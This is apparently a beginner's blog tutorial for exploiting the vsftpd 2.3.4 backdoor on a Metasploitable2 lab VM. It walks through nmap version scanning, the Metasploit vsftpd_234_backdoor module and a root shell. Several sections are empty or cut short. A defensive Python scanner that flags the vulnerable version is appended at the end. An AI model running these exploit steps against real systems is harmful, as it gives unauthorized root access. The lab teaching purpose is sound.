Exploiting vsftpd 2.3.4 on Metasploitable2 (Step-by-Step Guide for Beginners)
One of the biggest turning points in learning cybersecurity is understanding how attackers move from:

Discovery → Exploitation → Access

In a training session I led, students went from running a simple scan to gaining root access on a vulnerable machine. The excitement was great, but the real value was understanding how and why it worked.

In this guide, you'll replicate that exact process step by step.

- How to scan a target using Nmap
- How to identify vulnerable services
- How the vsftpd 2.3.4 backdoor works
- How to exploit it using Metasploit
- How to gain root access

Make sure your lab is ready:

- Kali Linux (attacker)
- Metasploitable2 (target)
- Both machines on the same network (NAT or Host-only)

On Metasploitable2:

    ifconfig

Look for something like:

    192.168.56.101

On Kali:

    nmap -sV target_ip

Why -sV matters

- Detects service versions

Key Result

This is your entry point.

vsftpd 2.3.4 contains a backdoor.

Trigger condition:

This is intentionally vulnerable, perfect for learning exploitation.

    msfconsole
    search vsftpd

Expected result:

    use exploit/unix/ftp/vsftpd_234_backdoor
    set RHOST target_ip
    run

    Command shell session 1 opened

    whoami

Output:

    root

You now have root access.

Key Concepts (Simple Breakdown)

- Reconnaissance
- Enumeration
- Exploitation
- Metasploit

Common Beginner Mistakes

Skipping Version Detection

Wrong:

    nmap target_ip

Correct:

    nmap -sV target_ip

Using the Wrong IP

- Mixing attacker and target IP
- Using 127.0.0.1 incorrectly

Always verify:

    ifconfig

Network Misconfiguration

If nothing works:

- Check both VMs are on the same network

Forgetting RHOST

Blindly Running Exploits

Don't just run tools. Ask:

- Why does this vulnerability exist?

Use a workflow:

- Scan

This lab shows a complete beginner-friendly attack chain:

- Discover a service

Even though this is a deliberately vulnerable system, the process is exactly how real penetration testing works. The goal is not just to hack, but to understand.

Next Steps

If you're learning cybersecurity:

Stay consistent.
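The version-detection step and the "Skipping Version Detection" mistake above, seen from the defender's side: this added example (not part of the original guide) parses the port table of normal `nmap -sV` output and flags vsftpd 2.3.4 in a service inventory. The function names, the `FLAGGED` table and both sample outputs are constructed for illustration.

```python
import re

# Service versions to flag; vsftpd 2.3.4 is the one this guide covers.
FLAGGED = {("vsftpd", "2.3.4"): "backdoored vsftpd release"}

# One row of the port table in normal nmap output: PORT STATE SERVICE [VERSION]
ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*\S))?\s*$")

def parse_ports(nmap_text):
    """Return one dict per port-table row; 'version' is '' when -sV was not used."""
    rows = []
    for line in nmap_text.splitlines():
        m = ROW.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            rows.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version or ""})
    return rows

def flag_services(nmap_text):
    """Return (port, product, version, reason) for open ports running a flagged version."""
    findings = []
    for row in parse_ports(nmap_text):
        if row["state"] != "open":
            continue
        tokens = row["version"].split()
        for (product, ver), reason in FLAGGED.items():
            if product in tokens and ver in tokens:
                findings.append((row["port"], product, ver, reason))
    return findings

# Constructed sample output (not captured from a real scan).
WITH_SV = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
"""
WITHOUT_SV = """\
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
"""

if __name__ == "__main__":
    print(flag_services(WITH_SV))     # the FTP service on port 21 is flagged
    print(flag_services(WITHOUT_SV))  # no version column, so nothing can be flagged
```

Without `-sV` the same host produces no finding, which is why an inventory built from plain port scans misses this service.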
Follow for more hands-on cybersecurity labs and real-world breakdowns.
